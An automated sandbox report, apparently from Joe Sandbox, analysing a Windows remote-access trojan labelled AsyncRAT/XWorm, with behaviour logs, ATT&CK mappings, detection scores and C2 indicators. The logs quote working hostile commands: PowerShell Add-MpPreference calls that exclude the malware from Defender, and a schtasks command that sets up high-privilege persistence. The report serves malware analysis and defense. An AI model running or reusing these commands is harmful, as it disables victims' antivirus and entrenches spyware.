                    Source: C:\Users\user\Desktop\24572628.exe - Window / User API: threadDelayed 510
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6223
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 3608
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7409
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2189
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7415
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2019
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7418
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2201
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe TID: 7472 - Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\24572628.exe TID: 5324 - Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 - Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084 - Thread sleep count: 7409 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 - Thread sleep count: 2189 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112 - Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180 - Thread sleep count: 7415 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4796 - Thread sleep count: 2019 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160 - Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072 - Thread sleep count: 7418 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072 - Thread sleep count: 2201 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2292 - Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\ProgramData\coding TID: 3440 - Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 8060 - Thread sleep time: -30000s >= -30000s
                    Source: C:\ProgramData\coding TID: 8072 - Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exe - File opened: PhysicalDrive0
                    Source: C:\Users\user\Desktop\24572628.exe - WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
                    Source: C:\Users\user\Desktop\24572628.exe - File Volume queried: C:\ FullSizeInformation
                    Source: C:\ProgramData\coding - File Volume queried: C:\ FullSizeInformation
                    Source: 24572628.exe.0.dr - Binary or memory string: vmware
                    Source: svchost.exe, 00000013.00000002.3423237128.00000284AE42B000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAWP
                    Source: svchost.exe, 00000013.00000002.3424437338.00000284AF858000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
                    Source: 24572628.exe, 00000003.00000002.3436634276.000000001B3C3000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\24572628.exe - Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\24572628.exe - Code function: 3_2_00007FF848A47A81 CheckRemoteDebuggerPresent,3_2_00007FF848A47A81
                    Source: C:\Users\user\Desktop\24572628.exe - Process queried: DebugPort
                    Source: C:\Users\user\Desktop\24572628.exe - Process token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                    Source: C:\ProgramData\coding - Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe - Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\24572628.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'
                    Source: C:\Users\user\Desktop\24572628.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe - Process created: C:\Users\user\Desktop\24572628.exe "C:\Users\user\Desktop\24572628.exe"
                    Source: C:\Users\user\Desktop\24572628.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe'
                    Source: C:\Users\user\Desktop\24572628.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding'
                    Source: C:\Users\user\Desktop\24572628.exe - Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Program Manager
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: Program Manager2
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe - Queries volume information: C:\Users\user\Desktop\YPzNsfg4nR.exe VolumeInformation
                    Source: C:\Users\user\Desktop\24572628.exe - Queries volume information: C:\Users\user\Desktop\24572628.exe VolumeInformation
                    Source: C:\Users\user\Desktop\24572628.exe - Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\ProgramData\coding Queries volume information: C:\ProgramData\coding VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: 24572628.exe, 00000003.00000002.3436634276.000000001B40E000.00000004.00000020.00020000.00000000.sdmp, 24572628.exe, 00000003.00000002.3436634276.000000001B45A000.00000004.00000020.00020000.00000000.sdmp, 24572628.exe, 00000003.00000002.3436634276.000000001B3C3000.00000004.00000020.00020000.00000000.sdmp, 24572628.exe, 00000003.00000002.3422310755.00000000008E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\24572628.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match; File source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: YPzNsfg4nR.exe PID: 7332, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: 24572628.exe PID: 7544, type: MEMORYSTR
                    Source: Yara match; File source: C:\ProgramData\coding, type: DROPPED
                    Source: Yara match; File source: C:\Users\user\Desktop\24572628.exe, type: DROPPED

                    Remote Access Functionality

                    Source: Yara match; File source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: YPzNsfg4nR.exe PID: 7332, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: 24572628.exe PID: 7544, type: MEMORYSTR
                    Source: Yara match; File source: C:\ProgramData\coding, type: DROPPED
                    Source: Yara match; File source: C:\Users\user\Desktop\24572628.exe, type: DROPPED
                    ATT&CK tactic: techniques (count of matched signatures in parentheses)

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: Windows Management Instrumentation (12); Scheduled Task/Job (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                    Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Privilege Escalation: DLL Side-Loading (1); Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (22); Timestomp (1); DLL Side-Loading (1); Masquerading (21); Virtualization/Sandbox Evasion (161); Process Injection (12)
                    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: File and Directory Discovery (1); System Information Discovery (33); Security Software Discovery (551); Process Discovery (2); Virtualization/Sandbox Evasion (161); Application Window Discovery (1); System Network Configuration Discovery (1); System Owner/User Discovery; Network Sniffing
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                    Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                    Behavior Graph ID: 1585127; Sample: YPzNsfg4nR.exe; Start date: 07/01/2025; Architecture: WINDOWS; Score: 100

                    Start node
                      DNS/IP: usb-alignment.gl.at.ply.gg; ip-api.com
                      Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
                      Started: YPzNsfg4nR.exe; coding; svchost.exe; 3 other processes

                    YPzNsfg4nR.exe
                      Dropped: C:\Users\user\Desktop\24572628.exe (PE32); C:\Users\user\AppData\...\YPzNsfg4nR.exe.log (CSV)
                      Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Started: 24572628.exe; conhost.exe

                    coding
                      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

                    svchost.exe
                      DNS/IP: 127.0.0.1 unknown unknown

                    24572628.exe
                      DNS/IP: usb-alignment.gl.at.ply.gg 147.185.221.21, 39219, 49999, 50007 SALSGIVERUS United States; ip-api.com 208.95.112.1, 49743, 80 TUT-ASUS United States
                      Dropped: C:\ProgramData\coding (PE32)
                      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 7 other signatures
                      Started: powershell.exe (three instances); 2 other processes

                    powershell.exe (first instance)
                      Signatures: Loading BitLocker PowerShell Module
                      Started: conhost.exe

                    powershell.exe (second and third instances)
                      Started: conhost.exe (one each)

                    2 other processes
                      Started: conhost.exe (two instances)

                    Source | Detection | Scanner | Label
                    YPzNsfg4nR.exe | 17% | Virustotal |
                    YPzNsfg4nR.exe | 8% | ReversingLabs |
                    YPzNsfg4nR.exe | 100% | Joe Sandbox ML |

                    Source | Detection | Scanner | Label
                    C:\ProgramData\coding | 100% | Avira | TR/Spy.Gen
                    C:\Users\user\Desktop\24572628.exe | 100% | Avira | TR/Spy.Gen
                    C:\ProgramData\coding | 100% | Joe Sandbox ML |
                    C:\Users\user\Desktop\24572628.exe | 100% | Joe Sandbox ML |
                    C:\ProgramData\coding | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
                    C:\Users\user\Desktop\24572628.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label
                    https://ion=v4.5n | 0% | Avira URL Cloud | safe
                    usb-alignment.gl.at.ply.gg | 100% | Avira URL Cloud | malware
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    ip-api.com | 208.95.112.1 | true | false | | high
                    usb-alignment.gl.at.ply.gg | 147.185.221.21 | true | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    usb-alignment.gl.at.ply.gg | true | Avira URL Cloud: malware | unknown
                    http://ip-api.com/line/?fields=hosting | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://g.live.com/odclientsettings/Prod/C: | edb.log.19.dr, qmgr.db.19.dr | false | | high
                    http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2349698693.0000017045FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2458610974.000001A290075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2614120753.0000021EE0183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://crl.m | powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000004.00000002.2331273020.0000017036199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000004.00000002.2331273020.0000017036199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 0000000B.00000002.2639330504.0000021EE8762000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://contoso.com/ | powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2349698693.0000017045FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2458610974.000001A290075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2614120753.0000021EE0183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://contoso.com/License | powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://crl.mic | powershell.exe, 0000000B.00000002.2641179501.0000021EE87F9000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://contoso.com/Icon | powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://crl.ver) | svchost.exe, 00000013.00000002.3423579528.00000284AE4BF000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000013.00000003.3002178502.00000284B3A70000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.dr, qmgr.db.19.dr | false | | high
                    http://crl.micft.cMicRosof | powershell.exe, 0000000B.00000002.2641179501.0000021EE87F9000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2331273020.0000017035F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C1052E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.microsoft.c | powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://ion=v4.5n | powershell.exe, 0000000B.00000002.2639330504.0000021EE878B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 24572628.exe, 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2331273020.0000017035F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2393482194.000001A280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2520104597.0000021ED0111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2688484901.000001C1052E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://crl.micros | powershell.exe, 00000008.00000002.2481707420.000001A2F4839000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
                    147.185.221.21 | usb-alignment.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true

                    IP
                    127.0.0.1
                    Joe Sandbox version: 41.0.0 Charoite
                    Analysis ID: 1585127
                    Start date and time: 2025-01-07 05:59:11 +01:00
                    Joe Sandbox product: CloudBasic
                    Overall analysis duration: 0h 8m 6s
                    Hypervisor based Inspection enabled: false
